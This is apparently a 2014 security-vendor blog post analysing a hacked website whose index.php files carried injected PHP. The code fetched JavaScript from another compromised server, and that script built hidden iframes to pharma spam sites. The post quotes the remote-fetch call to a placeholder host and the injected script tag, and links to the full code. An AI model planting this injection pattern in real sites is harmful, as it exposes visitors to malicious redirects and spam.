Thursday, May 8, 2014

PHP Code Injecting JavaScript Malware To Redirect To Pharma Sites

How Couple Of Compromised Servers Are Used For BlackHat Pharma SEO

Our malware analysts have recently finished cleaning up hacked site of a ThreatSign (anti-malware service) customer. We decided it worth a post to help others in malware research and prevention.

Malware execution diagram


We were contacted by webmaster whose site was blacklisted by Google. In addition to blacklisting status, external scan for malware showed numerous hidden iframes in the scanned html file(s).

After manual investigation of the files on site.cc (we can't provide real name of the customer site), it appeared that all index.php files were infected by php malware. Upon access to this server the malicious php code made request to another server:
__url_get_contents(http://hacked-server-url/_vti_bin/tky4df82.php, 1);
The output of this call was a portion of JavaScript where src attribute had visitor's IP (id=XXXXX) as appended parameter:
<script type="text/javascript" src="'returned-url'?id=XXXXX"></script>
Digging further, on the server to which the call was made. It appeared to be hosting proxy php module at /_vti_bin/tky4df82.php . The JavaScript, it finally served to our customer's (and most probably many others), generated those hidden iframes to pharmaceutical sites. It even had localization settings, so that you will get the site with the language according to your IP geo location.

Full php code was uploaded to pastebin, in case you encounter similar issue:  http://pastebin.com/ThYzmrfv

Malware clean-up


Uncovering online threats and hidden malware is easy and effective with Online Malware Scanner. However, if you suspect that your website was infected, select from Malware Removal & Monitoring Plans for malware removal.

Alternatively, you can try to remove malware using Quttera's website scan report. Don't forget to submit your website(s) for re-testing and removing from blacklist if needed.